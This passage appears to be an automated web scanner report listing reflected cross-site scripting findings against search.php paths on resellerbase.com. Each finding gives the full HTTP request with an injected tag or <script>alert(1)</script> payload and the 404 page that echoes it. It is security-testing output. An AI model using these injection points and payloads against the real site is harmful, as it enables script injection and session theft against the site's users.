The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 53684<a>89e274aa0bf was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search53684<a>89e274aa0bf&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search53684<a>89e274aa0bf&opt=2 was not found on this server.</p>
...[SNIP]...

2.1263. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ec613<a>d70e565ab6c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...ec613<a>d70e565ab6c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...ec613<a>d70e565ab6c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1264. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b6cf<script>alert(1)</script>450c667cdb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9b6cf<script>alert(1)</script>450c667cdb0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9b6cf<script>alert(1)</script>450c667cdb0=1 was not found on this server.</p>
...[SNIP]...

2.1265. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4544d<a>38fecdc7a24 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24544d<a>38fecdc7a24 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24544d<a>38fecdc7a24 was not found on this server.</p>
...[SNIP]...

2.1266. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89d69<script>alert(1)</script>6988ceb4231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail89d69<script>alert(1)</script>6988ceb4231/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89d69<script>alert(1)</script>6988ceb4231/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1267. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1686<script>alert(1)</script>bfc2a2631b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15c1686<script>alert(1)</script>bfc2a2631b9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15c1686<script>alert(1)</script>bfc2a2631b9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1268. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9b46<script>alert(1)</script>d2c167c5ec9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesa9b46<script>alert(1)</script>d2c167c5ec9/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesa9b46<script>alert(1)</script>d2c167c5ec9/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1269. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b457<script>alert(1)</script>4256142e8d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos4b457<script>alert(1)</script>4256142e8d5/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos4b457<script>alert(1)</script>4256142e8d5/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1270. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c8b44<script>alert(1)</script>17403eebb43 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/imagesc8b44<script>alert(1)</script>17403eebb43/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/imagesc8b44<script>alert(1)</script>17403eebb43/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1271. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4c1e2<script>alert(1)</script>f4f77f848ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/search.php4c1e2<script>alert(1)</script>f4f77f848ac?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php4c1e2<script>alert(1)</script>f4f77f848ac?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1272. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 729f1<a>a82e5ea8f05 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search729f1<a>a82e5ea8f05&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search729f1<a>a82e5ea8f05&opt=2 was not found on this server.</p>
...[SNIP]...

2.1273. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 49501<a>a512c1b4bfa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...49501<a>a512c1b4bfa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...49501<a>a512c1b4bfa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1274. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3bae<script>alert(1)</script>2dd96e7208f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c3bae<script>alert(1)</script>2dd96e7208f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c3bae<script>alert(1)</script>2dd96e7208f=1 was not found on this server.</p>
...[SNIP]...

2.1275. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1eb7b<a>6b9d4ebd7d5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21eb7b<a>6b9d4ebd7d5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=21eb7b<a>6b9d4ebd7d5 was not found on this server.</p>
...[SNIP]...

2.1276. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5778<script>alert(1)</script>e5142479c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild5778<script>alert(1)</script>e5142479c8f/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild5778<script>alert(1)</script>e5142479c8f/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1277. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2520<script>alert(1)</script>e033b2f823d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15e2520<script>alert(1)</script>e033b2f823d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15e2520<script>alert(1)</script>e033b2f823d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1278. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbfb8<script>alert(1)</script>edcf34c5fda was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesdbfb8<script>alert(1)</script>edcf34c5fda/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesdbfb8<script>alert(1)</script>edcf34c5fda/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1279. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 28f34<script>alert(1)</script>4763ec48b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos28f34<script>alert(1)</script>4763ec48b1e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

